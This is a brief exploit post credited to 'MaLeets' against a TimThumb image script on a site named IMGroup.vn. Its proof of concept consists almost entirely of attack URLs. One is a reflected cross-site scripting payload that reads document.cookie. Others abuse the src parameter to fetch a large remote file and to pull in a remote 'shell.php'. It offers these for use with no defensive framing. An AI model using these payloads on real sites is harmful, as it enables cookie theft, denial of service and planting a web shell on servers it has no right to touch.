# Exploit Title: IMGroup.vn Workshop CSS Vulnerability
# Author: MaLeets
# Date: 4 August 2017
# Tested on: Windows 7
https://localhost/timthumb.php
Vulnerability? TimThumb OK.
Proof of concept (PoC)
https://localhost/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
https://localhost/timthumb.php?src=http://
https://localhost/timthumb.php?src=http://www.example.com/big_file&h=1&w=1
https://localhost/timthumb.php?src=http://www.example.com/shell.php
etc TimThumb exploit bro.
Kam007 (MaLeets Security)
Indonesian Freedom Security :*